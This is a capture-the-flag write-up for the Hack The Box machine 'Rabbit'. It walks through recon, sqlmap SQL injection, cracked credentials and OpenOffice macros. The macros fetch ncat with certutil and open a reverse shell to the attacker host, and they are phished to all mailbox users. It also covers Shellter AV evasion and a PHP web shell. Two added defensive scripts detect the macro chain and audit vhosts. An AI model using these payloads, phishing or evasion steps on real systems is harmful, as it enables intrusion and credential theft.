Writeup: Hack The Box — Rabbit

Edoardo Rosa
10 min read · Jan 6, 2019

Description

  • Name: Rabbit
  • IP: 10.10.10.71
  • Author: lkys37en
  • Difficulty: 6/10

Discovery

nmap -sV -sC -Pn -p- 10.10.10.71

25/tcp    open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-06-27 18:44:58Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:57+00:00; +5h00m00s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m00s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.7.19
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5722/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
6008/tcp open msrpc Microsoft Windows RPC
6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open msrpc Microsoft Windows RPC
6017/tcp open msrpc Microsoft Windows RPC
6142/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
9389/tcp open mc-nmf .NET Message Framing
44668/tcp open msrpc Microsoft Windows RPC
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
50242/tcp open msrpc Microsoft Windows RPC
50246/tcp open msrpc Microsoft Windows RPC
50292/tcp open msrpc Microsoft Windows RPC
50299/tcp open msrpc Microsoft Windows RPC
50327/tcp open msrpc Microsoft Windows RPC
50343/tcp open msrpc Microsoft Windows RPC
50354/tcp open msrpc Microsoft Windows RPC
50363/tcp open msrpc Microsoft Windows RPC
50365/tcp open msrpc Microsoft Windows RPC
50374/tcp open msrpc Microsoft Windows RPC
50387/tcp open msrpc Microsoft Windows RPC
50395/tcp open msrpc Microsoft Windows RPC
50410/tcp open msrpc Microsoft Windows RPC
50422/tcp open msrpc Microsoft Windows RPC
64337/tcp open mc-nmf .NET Message Framing
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

dirsearch on port 80:

403 -   58B  - /rpc
301 - 0B - /owa -> /owa/
403 - 58B - /RPC
401 - 1KB - /powershell
403 - 0B - /ews

dirsearch on port 443:

200 -  689B  - /
301 - 0B - /owa -> /owa/
301 - 157B - /aspnet_client -> https://10.10.10.71/aspnet_client/
302 - 126B - /ecp -> /ecp/
302 - 146B - /exchange -> https://10.10.10.71/owa
302 - 146B - /Exchange -> https://10.10.10.71/owa
302 - 146B - /exchweb -> https://10.10.10.71/owa
302 - 146B - /public -> https://10.10.10.71/owa
302 - 146B - /Public -> https://10.10.10.71/owa
302 - 146B - /PUBLIC -> https://10.10.10.71/owa
302 - 147B - /Exchange/ -> https://10.10.10.71/owa/
302 - 147B - /ExchWeb/ -> https://10.10.10.71/owa/
302 - 147B - /Public/ -> https://10.10.10.71/owa/
302 - 149B - /Exchange/md -> https://10.10.10.71/owa/md
401 - 0B - /ews
401 - 1KB - /Microsoft-Server-ActiveSync/
401 - 1KB - /powershell
401 - 58B - /rpc
401 - 58B - /RPC
403 - 2KB - /Trace.axd
500 - 3KB - /Exchange/admin.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
500 - 3KB - /Exchange/asp.aspx
500 - 3KB - /Exchange/aspxspy.aspx

dirsearch on port 8080:

200 -   10KB - /
200 - 10KB - /index
200 - 10KB - /Index
200 - 10KB - /INDEX
200 - 10KB - /index.html
200 - 198KB - /favicon
200 - 198KB - /favicon.ico
200 - 6KB - /index.old
301 - 328B - /joomla -> http://10.10.10.71:8080/joomla/
301 - 328B - /Joomla -> http://10.10.10.71:8080/Joomla/
301 - 330B - /complain -> http://10.10.10.71:8080/complain/
301 - 342B - /joomla/administrator -> http://10.10.10.71:8080/joomla/administrator/
403 - 308B - /phpmyadmin

Pwn

On the complain main page 10.10.10.71:8080/complain/:

Online Complaint Monitoring System (OCMS) is a system operated by the city of Pune, India. A Complaint Management System is one of latest productivity enhancement tools used widely by all organisations wherever there is a need of booking of complaints via operators and analysis of complaints which are made or are pending.

Searching for exploits for this application we found a blind SQL injection that relies on a hardcoded admin login (admin:admin123); that default login does not work on this installation, so we need to register as a Customer to get a valid session before performing the attack.

sqlmap -u "http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans" --cookie "PHPSESSID=shuv7rnuvj10rds4leqq4of5f6" --dbms mysql --random-agent -p id

The mod=admin views are reachable even though we registered as a Customer.

Now it is possible to dump all data from the complain, joomla and secret databases.

From the secret dump we got a bunch of credentials:

Database: secret
Table: users
[10 entries]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dumah | 33da7a40473c1637f1a2e142f4925194 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 |
+----------+----------------------------------+

Using hashcat, some of the hashes were cracked:

Ariel:pussycatdolls
Dimitri:shaunamaloney
Malek:barcelona
Dumah:popcorn
Kain:doradaybendita
Raziel:kelseylovesbarry
Moebius:santiago
Magnus:xNnWo6272k7x

and two were not:

Zephon:13fa8abd10eed98d89fd6fc678afaf94
Turel:d322dc36451587ea2994c84c9d9717a1

Unfortunately those credentials do not work on the Joomla installation, so we tried to log in to Outlook Web App (OWA):

  • Ariel works on OWA and ECP
  • Kain works on OWA and ECP
  • Magnus works on OWA and ECP
  • Raziel is listed as a user but we cannot log in with those credentials
  • Dimitri has an email address but cannot receive mail

From Ariel's mailbox we saw that the Administrator changed some software configurations.

All computers will now use OpenOffice by default, but they also deployed Windows Defender and some PowerShell constraints.

In addition we know that the Administrator is waiting for an email with some TPS reports.

Wrapping it all up: we can craft a malicious OpenOffice document that spawns a reverse shell, but we cannot use PowerShell and we may need some AV evasion for our payload/macro.

First of all we created the document with a LibreOffice Basic macro whose OnLoad function runs when the user opens the .odt file.

We could have used the metasploit module exploit/multi/misc/openoffice_document_macro, but it creates a dropper that uses PowerShell to spawn a meterpreter session, so we preferred to build the macro on our own.

We tried to generate our meterpreter shell with msfvenom,

and created a macro to download and execute the stager from an SMB share served with Impacket (smbserver.py DODO .):

Sub OnLoad
Shell("echo Pwned!")
Shell("cmd.exe /C net use /D /Y * && cmd.exe /C net use \\10.10.XX.XX\DODO & call \\10.10.XX.XX\DODO\dodo.exe")
End Sub

Running the generated executable locally (and then remotely) we failed miserably: Windows detects the malicious PE.

Windows detected the session and deleted the stager, so we must focus on getting a simple reverse shell instead.

After some tries we built a payload that pings our machine and downloads a file using certutil (as documented in PayloadsAllTheThings) rather than PowerShell.

Finally we created the ultimate payload:

Sub OnLoad
Shell("cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f ""http://10.10.XX.XX/ncat.exe"" C:\Users\Public\ncat.exe & C:\Users\Public\ncat.exe 10.10.XX.XX 443 -e powershell.exe")
End Sub

The macro:
  • Spawns a cmd.exe process.
  • Downloads a portable version of netcat using certutil from our machine (served with "python -m http.server 80").
  • Saves the file in C:\Users\Public (some other well-known paths did not work).
  • Calls the ncat.exe PE to connect back to the listener on our machine with powershell.exe attached.
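As a defensive counterpart to the two macros above (an addition to this writeup, not the author's code), here is a small triage script over process-creation events, modelled on what the chain leaves in telemetry: an office process spawning cmd.exe, certutil -urlcache fetching an executable into C:\Users\Public, net use against a bare IP address, and ncat -e handing out a shell. The ProcEvent records, the regexes and the use of 10.10.14.129 as the attacker host are constructed assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str    # parent process image name, e.g. "soffice.bin"
    image: str     # image name of the created process
    cmdline: str   # full command line of the created process

# Indicators modelled on the macro chain described in this writeup.
OFFICE_PARENTS = {"soffice.bin", "soffice.exe", "swriter.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
INDICATORS = {
    "certutil-download": re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*-f\b.*https?://", re.I),
    "net-use-remote-ip": re.compile(r"\bnet\s+use\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I),
    "netcat-exec-shell": re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\s+\S*(cmd|powershell)", re.I),
    "users-public-path": re.compile(r"c:\\users\\public\\", re.I),
}

def classify(ev):
    """Return the names of the indicators that fire on one process-creation event."""
    hits = []
    if ev.parent.lower() in OFFICE_PARENTS and ev.image.lower() in SHELLS:
        hits.append("office-spawned-shell")
    hits += [name for name, rx in INDICATORS.items() if rx.search(ev.cmdline)]
    return hits

def severity(hits):
    """An office-spawned shell plus any other indicator is the full macro chain."""
    if not hits:
        return "none"
    if "office-spawned-shell" in hits and len(hits) > 1:
        return "high"
    return "medium" if len(hits) > 1 else "low"

def triage(events):
    """Keep only the events with findings, each with its severity and hit list."""
    found = [(ev, classify(ev)) for ev in events]
    return [{"image": ev.image, "severity": severity(h), "hits": h} for ev, h in found if h]

# Constructed sample events (not real telemetry); 10.10.14.129 stands in for the attacker host.
SAMPLE_EVENTS = [
    ProcEvent("soffice.bin", "cmd.exe", r'cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f "http://10.10.14.129/ncat.exe" C:\Users\Public\ncat.exe & C:\Users\Public\ncat.exe 10.10.14.129 443 -e powershell.exe'),
    ProcEvent("soffice.bin", "cmd.exe", r"cmd.exe /C net use /D /Y * && cmd.exe /C net use \\10.10.14.129\DODO & call \\10.10.14.129\DODO\dodo.exe"),
    ProcEvent("cmd.exe", "certutil.exe", r"certutil.exe -verify C:\temp\server.cer"),   # benign certutil use
    ProcEvent("explorer.exe", "cmd.exe", r"cmd.exe /C net use Z: \\fileserver\share"),  # benign net use by name
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Both macro variants score "high" while the two benign events produce no findings; in a real deployment the parent/child pair would come from Sysmon event 1 or Windows event 4688 with command-line auditing enabled.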

Now it’s time to send the malicious ODF file to someone:

When in doubt… ¯\_(ツ)_/¯ … u̶s̶e̶ ̶b̶r̶u̶t̶e̶ ̶f̶o̶r̶c̶e̶ send mails to everyone

From OWA we kindly sent the file to everyone, suggesting that they enable the macro.

After a while (5–6 minutes) we saw a download of the netcat file and a shell popped as the Raziel user! Now we also know who the right recipient is!

Finally we were able to read the Rabbit user flag.

User flag

Now we need to upgrade our shell to a meterpreter session and escalate privileges to Administrator, but we can't use PowerShell since the shell is in ConstrainedLanguage mode ("$ExecutionContext.SessionState.LanguageMode") and we can't spawn a PowerShell version 2 to bypass the jail.

We tried to upload an EXE generated with msfvenom, but its execution is blocked by the AV, so we created a FUD PE with Shellter:

  • ncat.exe (an EXE that we already had in the folder) as base (use your own EXE in real-world scenarios)
  • enable mode Auto
  • enable mode Stealth (when you use the Stealth Mode feature you need to set the payload exit function to Thread on the metasploit handler)
  • set payload as meterpreter_reverse_tcp
  • set LHOST
  • set LPORT
  • upload the generated file to the remote machine with certutil -urlcache -split -f "http://10.10.XX.XX/dodo.exe" C:\Users\Public\dodo.exe
  • set up the metasploit listener:
use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 3487; set AutoRunScript post/windows/manage/migrate; run -j;

N.B.: do not upload anything to online services to check whether the PE is really undetectable!

We now got a migrated meterpreter session!

But after a few seconds the connection is killed target-side for some reason (maybe the AV detects the connection or the malicious payload in memory). We have to use the constrained shell spawned with netcat.

net user Raziel
User name Raziel
Full Name Raziel
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/29/2017 10:04:44 AM
Password expires Never
Password changeable 10/30/2017 10:04:44 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/11/2018 12:00:39 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Discovery Management *Mailbox Import-Export
*Domain Users *Organization Manageme
The command completed successfully.

From the Joomla configuration we read the MySQL username and password, but we were not able to find or exploit anything beyond what we had already seen with sqlmap.

type C:\wamp64\www\joomla\configuration.php

public $host = 'localhost';
public $user = 'dbuser';
public $password = 'zLlYCLRmqFMaONwY';
public $db = 'joomla';
public $dbprefix = 'llhe4_';
public $live_site = '';
public $secret = 'QJMwxJmeJP18x25X';

We first focused on finding some SYSTEM services to hijack, but from tasklist /V we found that only the "Father of All Processes" is owned by NT AUTHORITY\SYSTEM.

Since we were interested in the MySQL service, we headed to "C:\wamp64\www", where all the web server content and configuration is stored, and started searching for a configuration containing the root password; instead we found an index.old.php file.

From this page we saw that the virtual host alias "wordpress.htb.local" exists but has no matching folder in Apache's www directory. From the documentation of the tasklist command we noticed that it returns an empty user name for system processes, so httpd.exe could well be running as the admin user, since we did not see an associated user for that process.

We created the "wordpress" folder in "C:\wamp64\www" and added the domain to our local /etc/hosts file.

So we wrote a simple web shell and uploaded it to the Rabbit machine with curl:
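The misconfiguration exploited here is a virtual host whose DocumentRoot does not exist, inside a www directory a low-privilege user can write to. As an added example (not from the writeup or from WAMP), this script parses an Apache vhost file and reports every vhost whose DocumentRoot is missing, so the folder cannot be created later by whoever controls the parent directory. The SAMPLE_CONF text and the simulated EXISTING_DIRS filesystem are constructed assumptions, not the box's real configuration.

```python
import os
import re

VHOST_RE = re.compile(r"<VirtualHost[^>]*>(.*?)</VirtualHost>", re.S | re.I)
DIRECTIVE_RE = re.compile(r'^\s*(ServerName|ServerAlias|DocumentRoot)\s+"?([^"\r\n]+?)"?\s*$', re.M | re.I)

def parse_vhosts(conf_text):
    """Return one dict per <VirtualHost> block with its host names and DocumentRoot."""
    vhosts = []
    for block in VHOST_RE.findall(conf_text):
        entry = {"names": [], "docroot": None}
        for key, value in DIRECTIVE_RE.findall(block):
            if key.lower() == "documentroot":
                entry["docroot"] = value.strip()
            else:
                entry["names"] += value.split()   # ServerAlias may list several names
        vhosts.append(entry)
    return vhosts

def audit_vhosts(conf_text, isdir=os.path.isdir):
    """Flag vhosts whose DocumentRoot is absent: whoever can create that folder
    serves their own scripts under the account httpd runs as."""
    findings = []
    for vh in parse_vhosts(conf_text):
        if vh["docroot"] and not isdir(vh["docroot"]):
            findings.append((", ".join(vh["names"]), vh["docroot"]))
    return findings

# Constructed config modelled on the WAMP layout seen in the writeup (not the box's real file).
SAMPLE_CONF = r"""
<VirtualHost *:8080>
    ServerName example.htb.local
    DocumentRoot "C:/wamp64/www"
</VirtualHost>
<VirtualHost *:8080>
    ServerName wordpress.htb.local
    DocumentRoot "C:/wamp64/www/wordpress"
</VirtualHost>
"""
EXISTING_DIRS = {"C:/wamp64/www"}   # simulated filesystem so the example runs offline

if __name__ == "__main__":
    for names, root in audit_vhosts(SAMPLE_CONF, isdir=lambda p: p in EXISTING_DIRS):
        print(f"{names}: DocumentRoot {root} does not exist")
```

On a real host drop the isdir argument so the check hits the actual filesystem, and pair the report with a review of who can write to each DocumentRoot's parent directory.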

<?php
system($_GET["cmd"]);
Root shell

Now we can easily read the root flag with

http http://wordpress.htb.local:8080/index.php\?cmd\="type C:\Users\Administrator\Desktop\root.txt"
Root flag
HTB Rabbit Badge

https://www.hackthebox.eu/profile/1752

Edoardo Rosa

Security Engineer: loving cloud, red teaming and automation